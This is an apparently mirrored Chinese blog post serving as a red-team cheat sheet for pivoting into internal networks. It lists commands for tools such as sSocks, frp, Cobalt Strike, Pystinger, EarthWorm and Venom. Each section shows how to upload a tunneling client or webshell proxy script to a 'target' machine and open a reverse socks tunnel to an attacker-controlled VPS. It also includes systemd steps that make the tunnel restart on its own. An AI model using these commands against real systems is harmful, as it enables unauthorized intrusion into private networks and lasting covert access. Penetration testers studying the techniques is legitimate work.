内网流量代理
source link: https://ssooking.github.io/2020/05/%E5%86%85%E7%BD%91%E6%B5%81%E9%87%8F%E4%BB%A3%E7%90%86/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
sSocket
下载地址:https://sourceforge.net/projects/ssocks/
一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务。
vps监听1088端口:
rcsocket.exe –l 1088 –p 8888 –vv
内网目标机器执行:
./rssocks –vv –s VPSip:8888
frp下载链接:https://github.com/fatedier/frp/releases
frps上传到服务器上;frpc是要放到目标机上。
1、配置服务端
修改frps.ini服务器端配置文件
[common]
bind_port = 10800
2、配置客户端
修改frpc.ini客户端配置文件:
[common]
server_addr = 110.120.90.80
server_port = 10800
[socks5]
type = tcp
remote_port = 10800
plugin = socks5
use_encryption = true
use_compression = true
先启动服务端:./frps -c ./frps.ini
再启动客户端:./frpc -c ./frpc.ini
nohup sudo ./frps -c frps.ini > log 2>&1 &
4、设置代理工具,连接到vps公网ip的10800端口
5、开机自启
Linux环境下,frp只能通过systemd方式自启。
frp_0.34.3_linux_amd64.tar.gz
解压之后可以看到一个 systemd
目录,将其中的 frps.service
文件复制到服务器的 /etc/systemd/system/
目录下,并修改 ExecStart=/usr/local/frp/frps -c /usr/local/frp/frps.ini
。
[Unit]
Description=frpc
Wants=network-online.target
After=network.target network-online.target
Requires=network-online.target
[Service]
ExecStart=/home/pi/github/frp_0.33.0_linux_arm/frpc -c /home/pi/github/frp_0.33.0_linux_arm/frpc.ini
#ExecStart=/home/pi/github/frp_0.33.0_linux_arm/run.sh
ExecStop=/bin/kill $MAINPID
Restart=always
RestartSec=5
StartLimitInterval=0
[Install]
WantedBy=multi-user.target
#重新加载配置文件
sudo systemctl daemon-reload #service文件改动后要重新reload一下(类似刷新到缓存里)
sudo systemctl enable frp.service #设置开机启动
sudo systemctl status frp.service #查询自启状态
CobaltStrike
beacon > socks 1024 #端口根据VPS实际情况进行设置
Cs菜单栏View > Proxy Pivots
,复制代理连接到Metasploit中,或直接将socks4a挂在相关安全工具中。
Pystinger
毒刺(pystinger)通过webshell实现内网SOCK4代理, 端口映射.
可直接用于metasploit-framework, viper, cobalt strike上线.
主体使用python开发, 当前支持php, jsp(x), aspx三种代理脚本.
上传代理脚本到目标服务器
在目标主机执行命令开启stinger_server服务
# Windows start stinger_server.exe # Linux chmod +x stinger_server && ./stinger_server
在公网vps上执行命令打通隧道
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
此时已经在vps
127.0.0.1:60000
启动了一个example.com
所在内网的socks4a代理此时已经将目标服务器的
127.0.0.1:60020
映射到vps的127.0.0.1:60020
用proxychains验证socks4a代理是否工作正常
Sunny-Ngrok
官网链接:http://ngrok.cc/
支持HTTPS、TCP、UDP流量转发。使用方式参考官方文档。
- 首先在Ngrok官网进行账号注册
- 注册完进入系统,访问
开通隧道
,选择免费服务: - 进行隧道配置
- 隧道名称:随意
- 前置域名:随意,默认域名后缀为ngrok.cc
- 配置完毕并添加后,服务器自动分配了一个免费域名用于与目标站点进行映射
- 在隧道管理中,点击”客户端下载”,并将客户端工具sunny.exe上传至目标服务器
- 在目标服务器执行sunny,建立隧道连接:
sunny.exe clientid 隧道id
- 此时在公网访问 Ngrok 服务器分配给我们的域名即可访问到服务器。
类似的一个,不过仅支持HTTP(s)和WSS协议:https://natapp.cn/
Earthworm
官网链接:http://rootkiter.com/EarthWorm/
正向socks5代理
./ew -s ssocksd -l 1080
直接代理工具直接设置为目标IP的1080端口即可
反向socks5代理
公网VPS添加隧道,把本地1080端口收到的代理请求转交给8888端口
./ew_linux_x64 -s rcsocks -l 1080 -e 8888
目标主机开启反弹socks服务,连接公网机器
./ew_linux_x64 -s rssocks -d 公网VPS的IP -e 8888
现在通过公网VPS主机的8888端口可以直接访问内网
多级代理
参考官网文档。
venom
官网链接:https://github.com/Dliv3/Venom
多级网络流量代理工具,可进行端口转发、端口复用、交互式shell等。
admin/agent命令行参数
admin节点和agent节点均可监听连接也可发起连接
admin监听端口,agent发起连接:
./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999
agent监听端口,admin发起连接:
./agent_linux_x64 -lport 8888
./admin_macos_x64 -rhost 192.168.204.139 -rport 8888
节点间通信加密
Venom提供节点间通信加密功能,用户可通过
-passwd
选项指定密码,该密码用于生成AES加密所需的密钥。# 通过-passwd指定密码为dlive@dubhe ./admin_macos_x64 -lport 8889 -passwd dlive@dubhe # agent指定相同的密码与admin节点连接 ./agent_macos_x64 -rhost 192.168.0.103 -rport 8889 -passwd dlive@dubhe
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK